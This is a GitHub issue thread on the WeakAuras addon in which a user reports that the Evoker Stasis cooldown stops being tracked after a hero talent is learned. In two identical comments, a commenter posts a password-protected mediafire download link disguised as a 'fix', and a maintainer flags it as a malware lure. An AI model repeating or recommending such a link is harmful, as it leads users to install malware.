### ISSUE TITLE
WA can't track prev evoker's stasis cooldown after learning hero talent

### ISSUE THREAD

**Issue by Elnarfim** [WeakAuras/WeakAuras2#5368]
### Is there an existing issue for this?

- [X] I have searched the existing open and closed issues.

### Description

WA can't track cooldown of the spell after learning hero talent (perhaps normal as well?) until logout
I've experienced simillar things in 11.0. in case WA can't track empowered spells cooldown and macros which uses empowered spells are disabled after changing talent loadout
I think it is Blizz bugs in TWW build but WA team should figure out this matter

### WeakAuras Version

5.17

### World of Warcraft Flavor

Retail (Default)

### World of Warcraft Region

TW/Asia

### Tested with only WeakAuras

I got this issue with only WeakAuras enabled

### Reproduction Steps

Make aura to track Stasis or just get this WA (https://wago.io/ZPIlXvfjC) from wago
Make your toon's level up and choose hero talent
Check the aura which you've got
Perhaps it happens in instance only

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by InfusOnWoW** [comment]
@Elnarfim the post by rickdoq were attempts at tricking you into running malware, please ignore thoes messages.

**Comment by InfusOnWoW** [comment]
That aura contains custom code, which is probably outdated. You need to contact the author of that custom code, or debug it yourself.

**Comment by Elnarfim** [comment]
I've posted wrong link. I'm using just simple aura which tracks stasis cd. It has broken not that wago aura. please figure out in detail
